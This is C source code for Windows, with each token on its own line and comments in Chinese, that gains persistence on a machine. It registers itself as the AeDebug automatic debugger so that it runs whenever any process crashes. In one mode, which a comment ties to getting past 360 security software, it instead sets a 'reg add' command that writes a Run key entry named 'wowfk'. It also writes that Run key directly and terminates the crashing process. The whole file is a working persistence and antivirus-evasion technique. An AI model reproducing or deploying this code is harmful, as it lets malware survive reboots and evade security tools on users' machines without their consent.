int
pass360
=
true;
int
SetAeDebug()
{
HKEY key
=
{
0
};
DWORD res
=
0
;
char CurrentPath[MAX_PATH]
=
{
0
};
char Shell[MAX_PATH]
=
{
0
};
char
*
Debuger
=
NULL;
GetModuleFileNameA(
0
, CurrentPath, MAX_PATH);
/
/
%
ld 是为了接收触发异常的进程pid。最终命令为 CurrentPath
-
cmd xxx
Debuger
=
CurrentPath;
/
/
360
联网的话需要这样做
if
(pass360)
{
sprintf(Shell,
"reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v wowfk /d \"%s\" /f"
, CurrentPath);
Debuger
=
Shell;
}
else
{
strncat(CurrentPath,
" -cmd %ld"
,
10
);
}
res
=
RegCreateKeyA(HKEY_LOCAL_MACHINE,
"SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\"
, &key);
if
(!res)
{
res
=
RegSetValueExA(key,
"Auto"
,
0
, REG_SZ, (CONST BYTE
*
)
"1"
,
1
);
if
(!res)
{
res
=
strnlen(Debuger, MAX_PATH);
res
=
RegSetValueExA(key,
"Debugger"
,
0
, REG_SZ, (CONST BYTE
*
)Debuger, res);
res
=
res
=
=
0
;
}
RegCloseKey(key);
}
return
res;
}
int
SetAutoRun()
{
HKEY key
=
{
0
};
DWORD res
=
0
;
char CurrentPath[MAX_PATH]
=
{
0
};
GetModuleFileNameA(
0
, CurrentPath, MAX_PATH);
res
=
RegCreateKeyA(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
, &key);
if
(!res)
{
strncat(CurrentPath,
" -AutoRun"
,
9
);
res
=
strnlen(CurrentPath, MAX_PATH);
res
=
RegSetValueExA(key,
"wowfk"
,
0
, REG_SZ, (CONST BYTE
*
)CurrentPath, res);
res
=
res
=
=
0
;
RegCloseKey(key);
}
return
res;
}
int
KillExceptProcess(char
*
strPid)
{
int
pid
=
0
;
pid
=
atoi(strPid);
int
res
=
0
;
HANDLE hProcess
=
OpenProcess(PROCESS_ALL_ACCESS,
0
, pid);
if
(hProcess)
{
res
=
TerminateProcess(hProcess,
0
);
CloseHandle(hProcess);
}
return
res;
}
int
main(
int
argc,char
*
argv[])
{
if
(argc
=
=
1
&& SetAeDebug()
=
=
1
)
{
MessageBoxA(
0
,
"See"
,
"Done"
,
0
);
_asm
int
3
}
else
if
(argc
=
=
3
&& !pass360)
{
/
/
防止二次执行
if
(KillExceptProcess(argv[
2
]))
{
if
(SetAutoRun()
=
=
1
)
{
MessageBoxA(
0
,
"AddAutoRunDone"
,
"AutoRun"
,
0
);
}
}
}
}